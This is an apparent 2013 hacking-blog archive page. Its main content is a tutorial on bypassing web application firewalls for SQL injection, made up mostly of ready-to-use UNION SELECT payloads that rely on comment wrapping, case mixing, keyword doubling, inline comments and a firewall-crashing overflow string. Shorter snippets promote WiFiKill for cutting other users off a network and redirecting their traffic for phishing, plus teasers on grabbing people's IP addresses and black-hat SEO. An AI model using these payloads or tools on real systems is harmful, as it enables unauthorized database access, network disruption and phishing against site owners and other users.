Monthly Archives: June 2013
Advance WAF ByPassing Techiques
Let’s Begin!
How to know if there is a Web Application Firewall?
This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)
Basic/Simple Methods:
First, of course, we need to know the Basic Methods to bypass WAF…
1) Comments:
You can use comments to bypass WAF:
Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)
However, most WAF identify this method so they still show a “Forbidden” Error…
2) Change the Case of the Letters:
You can also change the Case of the Command:
Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)
However, as before, this trick is also detected by most WAF!
3) Combine the previous Methods:
What you can also do is to combine the previous two methods:
Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!
4) Replaced Keywords:
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:
Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" 😀 )
5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)
I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…
Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!
1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!
Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....
(( You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....
If you get a 500, you can exploit it using the Buffer Overflow Method! :: Thanks Crysan for the Test))
2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.
Example:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()
[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! 😉
4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
The firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)
So, if you find such a silly function, you can exploit it, in this way! 😀
[+] In addition to the previous example, some other bypasses might be:
-15+(uNioN)+(sElECt)....
-15+(uNioN+SeleCT)+...
-15+(UnI)(oN)+(SeL)(ecT)+....
-15+union (select 1,2,3,4...)
BlackHat SEO – Get High Page Rank 4 Or 5
” Losses = 10 Benefits = 4 “
How To Get Someone’s IP Address Easily [New Way]
How To Get Someone’s I.P Through Blogger ?
In My Up-Coming Post , I’ll Tell You Easy And Fantastic Way To Get Someone’s IP Address 😀 xP
WiFiKill v1.7 – WiFi EjeCtOr
If you want to disable any ip address which use same router to connect internet. Now you can used your android application, WifiKill use as can disable internet connection for a device on the same network. This is alternate version of NETCUT for Android. Simply allows you to scan your wifi network for devices, see their vendor and cut network connection for specified devices. This way you can get rid of network hoggers. It gives option to redirect HTTP traffic to specific IP, this feature can be used even to do phishing smartly. Changelog: – fixed the counter bug (I hope for the last time) – added an option to redirect HTTP traffic to specific IP (caution! this may lead to significant CPU load) – now successful kills are tagged by green icon on the left of IP (this is not 100% correct)
Network Security Toolkit v2.16.0-4104 Released
The Network Security Toolkit is bootable ISO live CD/DVD (NST Live) is based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms.
Yaptest – Penetration Framework
- Run nikto on anything nmap thinks is an HTTP service
- Run hydra on every host with TCP port 21 open
- Attempt upload a file to any TFTP servers found
- Run onesixtyone on all hosts that are up
- Try metasploit’s solaris_kcms_readfile exploit against any hosts running kcmsd
ARPwner – 2Side Poisoning Tool
Volatility 2.2 Framework –
- Current date, time, CPU count, CPU speed, service pack
- Current thread and idle thread
- Addresses of the KDBG, KPCR, DTB, PsActiveProcessHead, PsLoadedModuleList, etc
- List active processes (column or tree view)
- Scan for hidden or terminated _EPROCESS objects (using pool tags or _DISPATCHER_HEADER)
- Enumerate DLLs in the PEB LDR lists
- Rebuild/extract DLLs or EXEs to disk based on name, base address, or physical offset
- Print open handles to files, registry keys, mutexes, threads, processes, etc
- List security identifiers (SIDs) for processes
- Scan for cmd.exe command history and full console input/output buffers
- List process environment variables
- Print PE version information from processes or DLLs (file version, company name, etc)
- Enumerate imported and exported API functions anywhere in process or kernel memory
- Show a list of virtual and physical mappings of all pages available to a process
- Dump process address space to disk as a single file
- Analyze Virtual Address Descriptor (VAD) nodes, show page protection, flags, and mapped files
- Represent the VAD in tree form or Graphviz .dot graphs
- Dump each VAD range to disk for inspecting with external tools
- Parse XP/2003 event log records
- Link strings found at physical offsets to their owning kernel address or process
- Interactive shell with disassembly, type display, hexdumps, etc
- And Much More , More Than Your Imagination ~